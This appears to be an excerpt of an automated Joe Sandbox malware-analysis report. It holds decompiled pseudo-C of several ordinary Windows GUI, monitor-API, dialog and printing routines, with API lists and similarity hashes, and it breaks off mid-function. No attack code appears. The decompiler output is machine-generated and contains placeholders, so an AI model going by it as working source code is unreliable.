                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: CapsDevice$MoveObjectRectViewport$ColorCreateSelectWindow$ClipFillH_prologIntersectLineModeRectangleStock
                                            • String ID: (
                                            • API String ID: 14264375-3887548279
                                            • Opcode ID: 5356feb156921028ef3ddc0151e9ddf4cdc27a2cc2d9984696750f9678fc26b0
                                            • Instruction ID: c53487ea9dce1701cc3862e452b5fc9e596f4e2bded4e1f589efc21baabd4d08
                                            • Opcode Fuzzy Hash: 5356feb156921028ef3ddc0151e9ddf4cdc27a2cc2d9984696750f9678fc26b0
                                            • Instruction Fuzzy Hash: EED14970A00219DFCB15DFA4D985EAEBBB5FF48304F14406AF816AB266CB35AD41CF64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 83%
                                            			E0041C129(int _a4, int _a8, struct HDC__* _a12) {
                                            				int* _v8;
                                            				intOrPtr* _v12;
                                            				void* _v16;
                                            				void* _t37;
                                            				signed int _t42;
                                            				struct HDC__* _t49;
                                            				struct HBITMAP__* _t50;
                                            				intOrPtr* _t60;
                                            				int* _t61;
                                            				int _t66;
                                            				signed int _t69;
                                            				intOrPtr* _t74;
                                            				signed int _t77;
                                            				signed int* _t82;
                                            				int _t83;
                                            				struct HDC__* _t84;
                                            				intOrPtr* _t85;
                                            
                                            				_t37 = LoadResource(_a4, _a8);
                                            				if(_t37 == 0) {
                                            					L3:
                                            					return 0;
                                            				}
                                            				_t60 = LockResource(_t37);
                                            				_v12 = _t60;
                                            				if(_t60 == 0) {
                                            					goto L3;
                                            				}
                                            				_t80 =  *_t60 + 0x40;
                                            				_t85 = E00405667( *_t60 + 0x40);
                                            				if(_t85 != 0) {
                                            					E00405700(_t85, _t60, _t80);
                                            					_t82 = _t85 +  *_t85;
                                            					_a8 = 0x10;
                                            					do {
                                            						_t42 =  *_t82;
                                            						_t69 = 0;
                                            						_t74 = 0x42dbc0;
                                            						while(_t42 !=  *_t74) {
                                            							_t74 = _t74 + 8;
                                            							_t69 = _t69 + 1;
                                            							if(_t74 < "DllGetVersion") {
                                            								continue;
                                            							}
                                            							goto L13;
                                            						}
                                            						if(_a12 == 0) {
                                            							_t61 = 0x42dbc4 + _t69 * 8;
                                            							_v8 = _t61;
                                            							GetSysColor( *(0x42dbc4 + _t69 * 8));
                                            							GetSysColor( *_t61);
                                            							 *_t82 = 0 << 0x00000008 | GetSysColor( *_v8) >> 0x00000010 & 0x000000ff;
                                            						} else {
                                            							if( *(0x42dbc4 + _t69 * 8) != 0x12) {
                                            								 *_t82 = 0xffffff;
                                            							}
                                            						}
                                            						L13:
                                            						_t82 =  &(_t82[1]);
                                            						_t14 =  &_a8;
                                            						 *_t14 = _a8 - 1;
                                            					} while ( *_t14 != 0);
                                            					_t83 =  *(_t85 + 4);
                                            					_t66 =  *(_t85 + 8);
                                            					_a4 = _t83;
                                            					_a8 = _t66;
                                            					_t49 = GetDC(0);
                                            					_a12 = _t49;
                                            					_t50 = CreateCompatibleBitmap(_t49, _t83, _t66);
                                            					_v8 = _t50;
                                            					if(_t50 != 0) {
                                            						_t84 = CreateCompatibleDC(_a12);
                                            						_v16 = SelectObject(_t84, _v8);
                                            						_push(0xcc0020);
                                            						_push(0);
                                            						_push(_t85);
                                            						_t77 = 1;
                                            						StretchDIBits(_t84, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v12 + 0x28 + (_t77 <<  *(_t85 + 0xe)) * 4, ??, ??, ??);
                                            						SelectObject(_t84, _v16);
                                            						DeleteDC(_t84);
                                            					}
                                            					ReleaseDC(0, _a12);
                                            					E004062E0(_t85);
                                            					return _v8;
                                            				}
                                            				goto L3;
                                            			}





















                                            APIs
                                            • LoadResource.KERNEL32(00000800,?,00000800,?,00000000,?,00000800), ref: 0041C138
                                            • LockResource.KERNEL32(00000000), ref: 0041C143
                                            • GetSysColor.USER32 ref: 0041C1C5
                                            • GetSysColor.USER32(00000000), ref: 0041C1D3
                                            • GetSysColor.USER32(00000000), ref: 0041C1E3
                                            • GetDC.USER32(00000000), ref: 0041C209
                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0041C215
                                            • CreateCompatibleDC.GDI32(00000000), ref: 0041C225
                                            • SelectObject.GDI32(00000000,00000000), ref: 0041C237
                                            • StretchDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00CC0020), ref: 0041C266
                                            • SelectObject.GDI32(00000000,00000000), ref: 0041C270
                                            • DeleteDC.GDI32(00000000), ref: 0041C273
                                            • ReleaseDC.USER32 ref: 0041C27E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Color$CompatibleCreateObjectResourceSelect$BitmapBitsDeleteLoadLockReleaseStretch
                                            • String ID: DllGetVersion
                                            • API String ID: 257281507-2861820592
                                            • Opcode ID: ba54e3975dec8b053c8b5ba4c6c2e954c4eed9ef953e3e4e01080731b16a167f
                                            • Instruction ID: 6de00a9f57abe9814b0481798e49b421408311c8e62ebcc167af93806f14bb4d
                                            • Opcode Fuzzy Hash: ba54e3975dec8b053c8b5ba4c6c2e954c4eed9ef953e3e4e01080731b16a167f
                                            • Instruction Fuzzy Hash: 8441D671640204FFDB219FA4DC88AAF3BB5FF48350B54802AF90597261D7349A56DFA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00404DD2() {
                                            				_Unknown_base(*)()* _t5;
                                            				_Unknown_base(*)()* _t6;
                                            				_Unknown_base(*)()* _t7;
                                            				_Unknown_base(*)()* _t8;
                                            				_Unknown_base(*)()* _t9;
                                            				_Unknown_base(*)()* _t10;
                                            				intOrPtr _t11;
                                            				struct HINSTANCE__* _t15;
                                            				intOrPtr _t17;
                                            				_Unknown_base(*)()* _t18;
                                            
                                            				_t17 =  *0x439620; // 0x0
                                            				if(_t17 == 0) {
                                            					_t15 = GetModuleHandleA("USER32");
                                            					if(_t15 == 0) {
                                            						L10:
                                            						 *0x439608 = 0;
                                            						 *0x43960c = 0;
                                            						 *0x439610 = 0;
                                            						 *0x439614 = 0;
                                            						 *0x439618 = 0;
                                            						 *0x43961c = 0;
                                            						 *0x439620 = 1;
                                            						return 0;
                                            					}
                                            					_t5 = GetProcAddress(_t15, "GetSystemMetrics");
                                            					 *0x439608 = _t5;
                                            					if(_t5 == 0) {
                                            						goto L10;
                                            					}
                                            					_t6 = GetProcAddress(_t15, "MonitorFromWindow");
                                            					 *0x43960c = _t6;
                                            					if(_t6 == 0) {
                                            						goto L10;
                                            					}
                                            					_t7 = GetProcAddress(_t15, "MonitorFromRect");
                                            					 *0x439610 = _t7;
                                            					if(_t7 == 0) {
                                            						goto L10;
                                            					}
                                            					_t8 = GetProcAddress(_t15, "MonitorFromPoint");
                                            					 *0x439614 = _t8;
                                            					if(_t8 == 0) {
                                            						goto L10;
                                            					}
                                            					_t9 = GetProcAddress(_t15, "EnumDisplayMonitors");
                                            					 *0x43961c = _t9;
                                            					if(_t9 == 0) {
                                            						goto L10;
                                            					}
                                            					_t10 = GetProcAddress(_t15, "GetMonitorInfoA");
                                            					 *0x439618 = _t10;
                                            					if(_t10 == 0) {
                                            						goto L10;
                                            					}
                                            					_t11 = 1;
                                            					 *0x439620 = _t11;
                                            					return _t11;
                                            				}
                                            				_t18 =  *0x439618; // 0x0
                                            				return 0 | _t18 != 0x00000000;
                                            			}














                                            APIs
                                            • GetModuleHandleA.KERNEL32(USER32,?,?,?,00404F0B), ref: 00404DF4
                                            • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00404E0C
                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00404E1D
                                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00404E2E
                                            • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 00404E3F
                                            • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00404E50
                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00404E61
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: AddressProc$HandleModule
                                            • String ID: EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                            • API String ID: 667068680-2376520503
                                            • Opcode ID: 7fe9bb0b6ed3d21d0ae434ea7fe5d9344b061dff9957d0254bf9a7d52565b885
                                            • Instruction ID: 29823efdfea0b27d0eaeb5a685ee6fdb8badc97bb1bd0a8226dd1226ed208354
                                            • Opcode Fuzzy Hash: 7fe9bb0b6ed3d21d0ae434ea7fe5d9344b061dff9957d0254bf9a7d52565b885
                                            • Instruction Fuzzy Hash: 081124B0A02610EAC711DF35ECD296FBAA4B7887643A4A53FD114E2290D7BC4941CBED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0042204B(intOrPtr* __ecx, struct HWND__* _a4, signed int _a8) {
                                            				struct HWND__* _v0;
                                            				intOrPtr _v4;
                                            				signed int _v8;
                                            				signed int _v12;
                                            				intOrPtr _t59;
                                            				int _t61;
                                            				int _t65;
                                            				struct HWND__* _t74;
                                            				struct HWND__* _t79;
                                            				struct HMENU__* _t81;
                                            				struct HWND__* _t84;
                                            				struct HWND__* _t88;
                                            				signed int _t90;
                                            				signed int _t91;
                                            				struct HMENU__* _t103;
                                            				intOrPtr* _t106;
                                            				int _t108;
                                            				intOrPtr* _t117;
                                            				int* _t118;
                                            				intOrPtr* _t119;
                                            				struct HWND__* _t120;
                                            
                                            				_t119 = __ecx;
                                            				_t59 =  *((intOrPtr*)( *__ecx + 0xc0))();
                                            				_t103 = 0;
                                            				_v4 = _t59;
                                            				if(_a4 != 0) {
                                            					_t117 =  *((intOrPtr*)(_t59 + 0x68));
                                            					if(_t117 != 0) {
                                            						 *((intOrPtr*)( *_t117 + 0x5c))(0);
                                            					}
                                            				}
                                            				_t120 =  *(_t119 + 0x70);
                                            				_t118 = _a8;
                                            				_v12 = _t103;
                                            				if(_t120 == _t103) {
                                            					L13:
                                            					_t118[2] = _v12;
                                            					if(_a4 == _t103) {
                                            						 *(_t119 + 0x9c) = _t103;
                                            						_t61 = GetDlgItem( *(_t119 + 0x1c), 0xea21);
                                            						__eflags = _t61;
                                            						_a4 = _t61;
                                            						if(_t61 != 0) {
                                            							_t74 = GetDlgItem( *(_t119 + 0x1c), 0xe900);
                                            							__eflags = _t74;
                                            							if(_t74 != 0) {
                                            								SetWindowLongA(_t74, 0xfffffff4, 0xea21);
                                            							}
                                            							SetWindowLongA(_a4, 0xfffffff4, 0xe900);
                                            						}
                                            						__eflags = _t118[1];
                                            						if(_t118[1] != 0) {
                                            							InvalidateRect( *(_t119 + 0x1c), 0, 1);
                                            							SetMenu( *(_t119 + 0x1c), _t118[1]);
                                            						}
                                            						_t108 =  *(_v4 + 0x68);
                                            						__eflags = _t108;
                                            						if(_t108 != 0) {
                                            							 *((intOrPtr*)( *_t108 + 0x5c))(1);
                                            						}
                                            						 *((intOrPtr*)( *_t119 + 0xc8))(1);
                                            						_t65 =  *_t118;
                                            						__eflags = _t65 - 0xe900;
                                            						if(_t65 != 0xe900) {
                                            							_v0 = GetDlgItem( *(_t119 + 0x1c), _t65);
                                            						}
                                            						ShowWindow(_v0, 5);
                                            						 *(_t119 + 0x48) = _t118[5];
                                            						return E00420A8B(1);
                                            					}
                                            					 *(_t119 + 0x9c) = _t118[4];
                                            					E00420A8B(_t103);
                                            					_t79 = GetDlgItem( *(_t119 + 0x1c),  *_t118);
                                            					_v0 = _t79;
                                            					ShowWindow(_t79, _t103);
                                            					_t81 = GetMenu( *(_t119 + 0x1c));
                                            					_t118[1] = _t81;
                                            					if(_t81 != _t103) {
                                            						InvalidateRect( *(_t119 + 0x1c), _t103, 1);
                                            						SetMenu( *(_t119 + 0x1c), _t103);
                                            						 *(_t119 + 0xb8) =  *(_t119 + 0xb8) & 0xfffffffe;
                                            					}
                                            					_t118[5] =  *(_t119 + 0x48);
                                            					 *(_t119 + 0x48) = _t103;
                                            					E0042065C(_t119, 0x7915);
                                            					if( *_t118 == 0xe900) {
                                            						_t84 = _a4;
                                            					} else {
                                            						_t84 = GetDlgItem( *(_t119 + 0x1c), 0xe900);
                                            					}
                                            					if(_t84 == 0) {
                                            						return _t84;
                                            					} else {
                                            						return SetWindowLongA(_t84, 0xfffffff4, 0xea21);
                                            					}
                                            				} else {
                                            					goto L4;
                                            				}
                                            				do {
                                            					L4:
                                            					_t88 = _t120;
                                            					_t120 = _v0;
                                            					_t106 =  *((intOrPtr*)(_t88 + 8));
                                            					_t90 = GetDlgCtrlID( *(_t106 + 0x1c)) & 0x0000ffff;
                                            					_v8 = _t90;
                                            					if(_t90 >= 0xe800 && _t90 <= 0xe81f) {
                                            						_t91 = 1;
                                            						_a8 = _t91 << _t90 - 0xe800;
                                            						if( *((intOrPtr*)( *_t106 + 0xc8))() != 0) {
                                            							_v12 = _v12 | _a8;
                                            						}
                                            						if( *((intOrPtr*)( *_t106 + 0xd0))() == 0 || _v8 != 0xe81f) {
                                            							E00421741(_t118[2] & _a8, _t106, _t118[2] & _a8, 1);
                                            						}
                                            					}
                                            				} while (_t120 != 0);
                                            				_t103 = 0;
                                            				goto L13;
                                            			}

























                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: ItemWindow$LongMenu$InvalidateRectShow$Ctrl
                                            • String ID:
                                            • API String ID: 461998371-0
                                            • Opcode ID: d02aa0295a976195957299b934b265eafdd74fa1612fec68cc443af8d633833d
                                            • Instruction ID: 11e971c61f50c2e3f40baeddfbca8ed65bc2cf00756bcc02c89e332112038adb
                                            • Opcode Fuzzy Hash: d02aa0295a976195957299b934b265eafdd74fa1612fec68cc443af8d633833d
                                            • Instruction Fuzzy Hash: D4617D30700311AFD7209F64EC88A2ABBF4FF48304F504A2EF656972A1CB75E855CB55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 94%
                                            			E004107DB(struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
                                            				void* _t32;
                                            				signed int _t34;
                                            				void* _t40;
                                            				int _t49;
                                            				signed int _t58;
                                            				intOrPtr _t63;
                                            				void* _t64;
                                            				intOrPtr* _t65;
                                            
                                            				if(_a4 == 0) {
                                            					L19:
                                            					return 0;
                                            				}
                                            				_t64 = E00425C92(0x4397cc, E0042440D);
                                            				_t54 =  *(_t64 + 0x18);
                                            				if( *(_t64 + 0x18) != 0) {
                                            					E00416433(_t54, _a4);
                                            					 *(_t64 + 0x18) =  *(_t64 + 0x18) & 0x00000000;
                                            				}
                                            				_t63 = _a8;
                                            				if(_t63 != 0x110) {
                                            					__eflags = _t63 -  *0x439cb0; // 0x0
                                            					if(__eflags == 0) {
                                            						L22:
                                            						SendMessageA(_a4, 0x111, 0xe146, 0);
                                            						_t32 = 1;
                                            						return _t32;
                                            					}
                                            					__eflags = _t63 - 0x111;
                                            					if(_t63 != 0x111) {
                                            						L8:
                                            						__eflags = _t63 - 0xc000;
                                            						if(_t63 < 0xc000) {
                                            							goto L19;
                                            						}
                                            						_push(_a4);
                                            						_t65 = E00413767();
                                            						_t34 = E00416753(_t65, 0x42e898);
                                            						__eflags = _t34;
                                            						if(_t34 == 0) {
                                            							L11:
                                            							__eflags = _t63 -  *0x439cbc; // 0x0
                                            							if(__eflags != 0) {
                                            								__eflags = _t63 -  *0x439cb8; // 0x0
                                            								if(__eflags != 0) {
                                            									__eflags = _t63 -  *0x439cc0; // 0x0
                                            									if(__eflags != 0) {
                                            										__eflags = _t63 -  *0x439cb4; // 0x0
                                            										if(__eflags != 0) {
                                            											goto L19;
                                            										}
                                            										return  *((intOrPtr*)( *_t65 + 0xd0))();
                                            									}
                                            									_t58 = _a16 >> 0x10;
                                            									__eflags = _t58;
                                            									 *((intOrPtr*)( *_t65 + 0xd8))(_a12, _a16 & 0x0000ffff, _t58);
                                            									goto L19;
                                            								}
                                            								__eflags =  *0x439c3c;
                                            								if( *0x439c3c != 0) {
                                            									 *(_t65 + 0x1f4) = _a16;
                                            								}
                                            								_t40 =  *((intOrPtr*)( *_t65 + 0xd4))();
                                            								 *(_t65 + 0x1f4) =  *(_t65 + 0x1f4) & 0x00000000;
                                            								return _t40;
                                            							}
                                            							return  *((intOrPtr*)( *_t65 + 0xd0))(_a16);
                                            						}
                                            						__eflags =  *(_t65 + 0x92) & 0x00000008;
                                            						if(( *(_t65 + 0x92) & 0x00000008) != 0) {
                                            							goto L19;
                                            						}
                                            						goto L11;
                                            					}
                                            					__eflags = _a12 - 0x40e;
                                            					if(_a12 == 0x40e) {
                                            						goto L22;
                                            					}
                                            					goto L8;
                                            				} else {
                                            					 *0x439cc0 = RegisterWindowMessageA("commdlg_LBSelChangedNotify");
                                            					 *0x439cbc = RegisterWindowMessageA("commdlg_ShareViolation");
                                            					 *0x439cb8 = RegisterWindowMessageA("commdlg_FileNameOK");
                                            					 *0x439cb4 = RegisterWindowMessageA("commdlg_ColorOK");
                                            					 *0x439cb0 = RegisterWindowMessageA("commdlg_help");
                                            					_t49 = RegisterWindowMessageA("commdlg_SetRGBColor");
                                            					_push(_a16);
                                            					 *0x439cac = _t49;
                                            					_push(_a12);
                                            					return E00411B77(_t54, _a4, 0x110);
                                            				}
                                            			}












                                            APIs
                                              • Part of subcall function 00425C92: TlsGetValue.KERNEL32(004399AC,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000,?,0040ECAE,00000000,00000000,00000000,00000000), ref: 00425CD1
                                            • RegisterWindowMessageA.USER32(commdlg_LBSelChangedNotify,Function_0002440D), ref: 00410826
                                            • RegisterWindowMessageA.USER32(commdlg_ShareViolation), ref: 00410832
                                            • RegisterWindowMessageA.USER32(commdlg_FileNameOK), ref: 0041083E
                                            • RegisterWindowMessageA.USER32(commdlg_ColorOK), ref: 0041084A
                                            • RegisterWindowMessageA.USER32(commdlg_help), ref: 00410856
                                            • RegisterWindowMessageA.USER32(commdlg_SetRGBColor), ref: 00410862
                                              • Part of subcall function 00416433: SetWindowLongA.USER32 ref: 00416462
                                            • SendMessageA.USER32(00000000,00000111,0000E146,00000000), ref: 00410955
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: MessageWindow$Register$LongSendValue
                                            • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                                            • API String ID: 2377901579-3888057576
                                            • Opcode ID: cf20618efcf828f21c6f481f5fb3a6feff5832e9dcd2cfa321dd56f44a1a627e
                                            • Instruction ID: 0c99fb2fb3094324f535d28c6dff1db6175635640ea54eadaac3d4f9a63322fb
                                            • Opcode Fuzzy Hash: cf20618efcf828f21c6f481f5fb3a6feff5832e9dcd2cfa321dd56f44a1a627e
                                            • Instruction Fuzzy Hash: B041AFB1704214ABDF24AF29DD54BAE3BA1EB00754F11542BF405972A2CBB99CC0CF9D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 92%
                                            			E00428103(intOrPtr* __ecx, void* __eflags) {
                                            				void* __ebx;
                                            				signed int _t227;
                                            				void* _t228;
                                            				CHAR* _t229;
                                            				intOrPtr _t231;
                                            				CHAR* _t232;
                                            				signed int _t233;
                                            				CHAR* _t242;
                                            				CHAR* _t243;
                                            				CHAR* _t253;
                                            				intOrPtr* _t256;
                                            				intOrPtr _t265;
                                            				signed char _t266;
                                            				intOrPtr _t268;
                                            				int _t290;
                                            				int _t296;
                                            				signed int _t300;
                                            				int _t310;
                                            				void* _t323;
                                            				void* _t335;
                                            				void* _t337;
                                            				intOrPtr _t353;
                                            				struct HDC__* _t355;
                                            				intOrPtr _t357;
                                            				signed char _t383;
                                            				void* _t396;
                                            				signed int _t449;
                                            				intOrPtr* _t452;
                                            				intOrPtr* _t455;
                                            				struct _DOCINFOA _t458;
                                            				void* _t460;
                                            				signed char _t461;
                                            				void* _t463;
                                            				void* _t465;
                                            				void* _t466;
                                            				void* _t468;
                                            
                                            				E00406520(E0042A280, _t463);
                                            				_t466 = _t465 - 0x32c;
                                            				_t452 = __ecx;
                                            				 *((intOrPtr*)(_t463 - 0x24)) = __ecx;
                                            				E00428824(_t463 - 0x80);
                                            				 *(_t463 - 4) = 0;
                                            				if( *((short*)(E00413672() + 8)) != 0xe108) {
                                            					L6:
                                            					_t227 =  *((intOrPtr*)( *_t452 + 0xf4))(_t463 - 0x80);
                                            					__eflags = _t227;
                                            					if(_t227 != 0) {
                                            						_t229 =  *0x436980; // 0x436994
                                            						 *(_t463 - 0x3c) = _t229;
                                            						 *(_t463 - 4) = 1;
                                            						_t231 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
                                            						__eflags =  *(_t231 + 0x14) & 0x00000020;
                                            						if(( *(_t231 + 0x14) & 0x00000020) == 0) {
                                            							L12:
                                            							_t232 =  *0x436980; // 0x436994
                                            							 *(_t463 - 0x14) = _t232;
                                            							_t233 =  *(_t452 + 0x3c);
                                            							 *(_t463 - 4) = 0xa;
                                            							__eflags = _t233;
                                            							if(_t233 == 0) {
                                            								E004140EE(E00414C6C(_t452), _t463 - 0x14);
                                            							} else {
                                            								E00416B95(_t463 - 0x14, _t463, _t233 + 0x1c);
                                            							}
                                            							__eflags =  *((intOrPtr*)( *(_t463 - 0x14) - 8)) - 0x1f;
                                            							if(__eflags > 0) {
                                            								E00416D10(_t463 - 0x14, __eflags, 0x1f);
                                            							}
                                            							_t458 = 0x14;
                                            							E00406330(_t463 - 0x94, 0, _t458);
                                            							_t468 = _t466 + 0xc;
                                            							 *(_t463 - 0x90) =  *(_t463 - 0x14);
                                            							_t242 =  *0x436980; // 0x436994
                                            							 *(_t463 - 0x94) = _t458;
                                            							 *(_t463 - 0x38) = _t242;
                                            							_t243 =  *(_t463 - 0x3c);
                                            							 *(_t463 - 4) = 0xb;
                                            							__eflags =  *(_t243 - 8);
                                            							if( *(_t243 - 8) != 0) {
                                            								 *(_t463 - 0x8c) = _t243;
                                            								E00417CBF(_t243, E00416CC1(_t463 - 0x38, _t463, 0x104), 0x104);
                                            								_t460 = 0xf049;
                                            							} else {
                                            								 *(_t463 - 0x8c) = 0;
                                            								_t323 = E004102D0( *((intOrPtr*)(_t463 - 0x80)), _t463 - 0x18);
                                            								 *(_t463 - 4) = 0xc;
                                            								E00416B95(_t463 - 0x38, _t463, _t323);
                                            								 *(_t463 - 4) = 0xb;
                                            								E00416AEC(_t463 - 0x18);
                                            								_t460 = 0xf040;
                                            							}
                                            							E00419B00(_t463 - 0x34);
                                            							__eflags =  *(_t463 - 0x7c);
                                            							 *(_t463 - 4) = 0xd;
                                            							if( *(_t463 - 0x7c) == 0) {
                                            								E00419BB7(_t463 - 0x34,  *( *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c)) + 0x10));
                                            								 *(_t463 - 0x28) = 1;
                                            							}
                                            							 *((intOrPtr*)( *_t452 + 0xf8))(_t463 - 0x34, _t463 - 0x80);
                                            							__eflags =  *(_t463 - 0x7c);
                                            							if( *(_t463 - 0x7c) == 0) {
                                            								SetAbortProc( *(_t463 - 0x30), E00427F7F);
                                            							}
                                            							E004166CE(E00404DAE(), 0);
                                            							_push(_t452);
                                            							E00428772(_t463 - 0xf0, __eflags);
                                            							_t253 =  *0x436980; // 0x436994
                                            							 *(_t463 - 0x20) = _t253;
                                            							 *(_t463 - 4) = 0xf;
                                            							E004164C6(_t463 - 0xf0, 0xc9,  *(_t463 - 0x14));
                                            							_t256 = E00410292( *((intOrPtr*)(_t463 - 0x80)), _t463 - 0x18);
                                            							 *(_t463 - 4) = 0x10;
                                            							E004164C6(_t463 - 0xf0, 0xca,  *_t256);
                                            							 *(_t463 - 4) = 0xf;
                                            							E00416AEC(_t463 - 0x18);
                                            							E0041E3FA(_t463 - 0x20, _t460,  *(_t463 - 0x38));
                                            							E004164C6(_t463 - 0xf0, 0xcb,  *(_t463 - 0x20));
                                            							E0041668C(_t463 - 0xf0, 5);
                                            							UpdateWindow( *(_t463 - 0xd4));
                                            							__eflags =  *(_t463 - 0x7c);
                                            							if( *(_t463 - 0x7c) != 0) {
                                            								L27:
                                            								_t265 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
                                            								_t449 =  *(_t265 + 0x1a) & 0x0000ffff;
                                            								_t383 =  *(_t265 + 0x1c) & 0x0000ffff;
                                            								_t461 =  *(_t265 + 0x18) & 0x0000ffff;
                                            								__eflags = _t449 - _t383;
                                            								 *(_t463 - 0x10) = _t449;
                                            								if(_t449 < _t383) {
                                            									 *(_t463 - 0x10) = _t383;
                                            								}
                                            								_t266 =  *(_t265 + 0x1e) & 0x0000ffff;
                                            								__eflags =  *(_t463 - 0x10) - _t266;
                                            								if( *(_t463 - 0x10) > _t266) {
                                            									 *(_t463 - 0x10) = _t266;
                                            								}
                                            								__eflags = _t461 - _t383;
                                            								if(_t461 < _t383) {
                                            									_t461 = _t383;
                                            								}
                                            								__eflags = _t461 - _t266;
                                            								if(_t461 > _t266) {
                                            									_t461 = _t266;
                                            								}
                                            								__eflags =  *(_t463 - 0x10) - _t461;
                                            								asm("sbb eax, eax");
                                            								_t268 = (_t266 & 0x000000fe) + 1;
                                            								__eflags =  *(_t463 - 0x10) - 0xffff;
                                            								 *((intOrPtr*)(_t463 - 0x18)) = _t268;
                                            								if(__eflags != 0) {
                                            									_t151 = _t463 - 0x10;
                                            									 *_t151 =  *(_t463 - 0x10) + _t268;
                                            									__eflags =  *_t151;
                                            								} else {
                                            									 *(_t463 - 0x10) = 0xffff;
                                            								}
                                            								E00417214(_t463 - 0x20, __eflags, 0xf043);
                                            								__eflags =  *(_t463 - 0x7c);
                                            								 *(_t463 - 0x1c) = 0;
                                            								if( *(_t463 - 0x7c) == 0) {
                                            									__eflags = _t461 -  *(_t463 - 0x10);
                                            									 *(_t463 - 0x6c) = _t461;
                                            									if(_t461 ==  *(_t463 - 0x10)) {
                                            										goto L53;
                                            									} else {
                                            										while(1) {
                                            											 *((intOrPtr*)( *_t452 + 0xdc))(_t463 - 0x34, _t463 - 0x80);
                                            											__eflags =  *(_t463 - 0x70);
                                            											if( *(_t463 - 0x70) == 0) {
                                            												goto L51;
                                            											}
                                            											wsprintfA(_t463 - 0x140,  *(_t463 - 0x20),  *(_t463 - 0x6c));
                                            											_t468 = _t468 + 0xc;
                                            											E004164C6(_t463 - 0xf0, 0xcc, _t463 - 0x140);
                                            											_t290 = GetDeviceCaps( *(_t463 - 0x2c), 0xa);
                                            											SetRect(_t463 - 0x5c, 0, 0, GetDeviceCaps( *(_t463 - 0x2c), 8), _t290);
                                            											DPtoLP( *(_t463 - 0x2c), _t463 - 0x5c, 2);
                                            											_t296 = StartPage( *(_t463 - 0x30));
